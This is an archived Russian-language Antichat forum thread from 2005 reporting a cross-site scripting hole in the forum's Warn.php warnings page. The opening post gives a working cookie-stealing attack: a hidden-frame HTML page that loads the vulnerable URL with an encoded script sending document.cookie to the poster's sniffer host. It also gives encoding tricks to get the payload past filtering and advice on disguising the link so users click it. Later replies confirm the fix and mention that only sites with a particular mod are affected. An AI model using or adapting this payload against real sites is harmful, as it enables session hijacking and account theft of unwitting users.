ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Уязвимость Форум.Античат.Ру (не критическая)
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Уязвимость Форум.Античат.Ру (не критическая)
  #1  
Старый 11.05.2005, 21:42
Аватар для censored!
censored!
Green member - Level 3
Регистрация: 02.11.2004
Сообщений: 1,337
Провел на форуме:
2398258

Репутация: 648


По умолчанию Уязвимость Форум.Античат.Ру (не критическая)
http://forum.antichat.ru/Warn.php пропускает вхождения

Пример: http://forum.antichat.ru/Warn.php?do...kie);</script>

Чего делать?
Создавать фрейм-содержащую страницу, где левый невидимый фрейм будет иметь путь до снифера* (* - см.ниже), а центральный - типа липовый сайт. И давать ссылку на свой сайт.
Вот так выглядит index.html (в примере адрес снифера указан мой):

Код HTML:
<html>
<head>
<title>Типа липовый сайт...</title>
</head>
<frameset cols="0,*" frameborder="NO" border="0" framespacing="0"> 
  <frame name="leftFrame" scrolling="NO" noresize src="http://forum.antichat.ru/Warn.php?do=ViewWarnings&id=0%22%3E%3Cscript%3Edocument.body.background=%22http://altsupport.h15.ru/cgi-bin/script.php?cook=%22%2Bdocument.cookie;%3C/script%3E">
  <frame name="mainFrame" src="main_frame.html">
</frameset>
<noframes><body>Ты зачем фреймы отрубил, засранец??? :)</body></noframes>
</html>
...
*
Так как + (плюсик) вырезается, его заменяем: %2B
Чтобы все это впихнуть в путь левого фрейма, " (кавычка) и скобки тоже заменяем:
" - %22
> - %3C
> - %3E
...
Если лень возится с сайтом, то можно и тут просто ссылкой дать. Не каждый же смотрит на статусную строку? А если еще УРЛ и перекодировать, то даже если и смотрят - все-равно нажмут (то что ниже - не перекодировал).

Как пример:
...
!ВНИМАНИЕ! ПРИ НАЖАТИИ НА СЛЕДУЮЩУЮ ССЫЛКУ ВАШИ КУКИ УЙДУТ КО МНЕ НА СНИФЕР!
...
Всем добро пожаловать на сайт http://forum.antichat.ru
...
© censored!
 
Ответить с цитированием

  #2  
Старый 11.05.2005, 22:23
Аватар для (-=util=-)
(-=util=-)
Постоянный
Регистрация: 02.12.2004
Сообщений: 352
Провел на форуме:
307649

Репутация: 67
Отправить сообщение для (-=util=-) с помощью ICQ
По умолчанию
Нифига себе намутил . А бага то красивая Аффтар жжот!!!
 
Ответить с цитированием

  #3  
Старый 11.05.2005, 22:25
Аватар для Algol
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916

Репутация: 0


По умолчанию
Спасибо, исправлено.
 
Ответить с цитированием

  #4  
Старый 12.05.2005, 16:53
Аватар для m0nzt3r
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463

Репутация: 2258


По умолчанию
Цитата:
Сообщение от Algol  
Спасибо, исправлено.
хорошо что исправил а то я по этой ссылке перешел )))
__________________
Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
 
Ответить с цитированием

  #5  
Старый 12.05.2005, 20:19
Аватар для Че Гевара
Че Гевара
Администратор
Регистрация: 05.10.2003
Сообщений: 1,083
Провел на форуме:
4618051

Репутация: 45


По умолчанию
Молодец ... Даю грина )
Цитата:
Нифига себе намутил . А бага то красивая Аффтар жжот!!!
Да, но прокатит она только там, где устанвлен хак "Warning Control [Created By Zero Tolerance]" ...
Последний раз редактировалось Че Гевара; 12.05.2005 в 20:29..
 
Ответить с цитированием

  #6  
Старый 14.05.2005, 02:09
Аватар для censored!
censored!
Green member - Level 3
Регистрация: 02.11.2004
Сообщений: 1,337
Провел на форуме:
2398258

Репутация: 648


По умолчанию
Добавление (всегда пригодится):
url-конвертер брать тут: [*censored*]


Цитата:
Да, но прокатит она только там, где устанвлен хак "Warning Control [Created By Zero Tolerance]" ...
Встречается он не часто, но все-равно встречается.
Последний раз редактировалось Algol; 14.05.2005 в 02:39..
 
Ответить с цитированием

  #7  
Старый 14.05.2005, 02:41
Аватар для Algol
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916

Репутация: 0


По умолчанию
Цитата:
Сообщение от Че Гевара  
Да, но прокатит она только там, где устанвлен хак "Warning Control [Created By Zero Tolerance]" ...
Кстати редкосная фигня....
Идея хорошая, а реализация - как всегда...
 
Ответить с цитированием

  #8  
Старый 14.05.2005, 02:55
Аватар для censored!
censored!
Green member - Level 3
Регистрация: 02.11.2004
Сообщений: 1,337
Провел на форуме:
2398258

Репутация: 648


По умолчанию
Цитата:
url-конвертер брать тут: [*censored*]
Видимая ссылка на другой ресурс? Оке. Понял. Буду маскировать.
 
Ответить с цитированием

  #9  
Старый 14.05.2005, 10:56
Аватар для Algol
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916

Репутация: 0


По умолчанию
Цитата:
Сообщение от censored!  
Видимая ссылка на другой ресурс? Оке. Понял. Буду маскировать.
Просто такая же возможность есть в нашем родном InetCrack
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ